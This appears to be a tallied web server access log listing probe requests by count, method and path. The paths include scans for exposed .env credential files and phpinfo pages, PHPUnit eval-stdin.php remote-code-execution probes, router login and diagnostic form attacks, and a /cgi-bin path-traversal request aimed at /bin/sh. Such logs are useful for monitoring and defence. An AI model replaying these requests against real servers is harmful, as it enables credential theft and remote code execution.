1	GET	`/laravel/core/.env`	HTTP/1.1
1	GET	`/lib/.env`	HTTP/1.1
1	GET	`/libs/.env`	HTTP/1.1
9	GET	`/map/baidumap.xml`	HTTP/1.1
1	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/phpinfo`	HTTP/1.1
2	GET	`/phpmyadmin/index.php`	HTTP/1.1
1	GET	`/prod/.env`	HTTP/1.1
1	GET	`/pub/.env`	HTTP/1.1
1	GET	`/public/.env`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/site/.env`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/sites/.env`	HTTP/1.1
1	GET	`/solr/admin/info/system?wt=json`	HTTP/1.1
2	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/w00tw00t.at[.]ISC[.]SANS[.]DFind:)`	HTTP/1.1
1	POST	`/Autodiscover/Autodiscover.xml`	HTTP/1.1
1	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
3	POST	`/boaform/admin/formLogin`	HTTP/1.1
2	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
1	POST	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
4	PRI	`*`	HTTP/2.0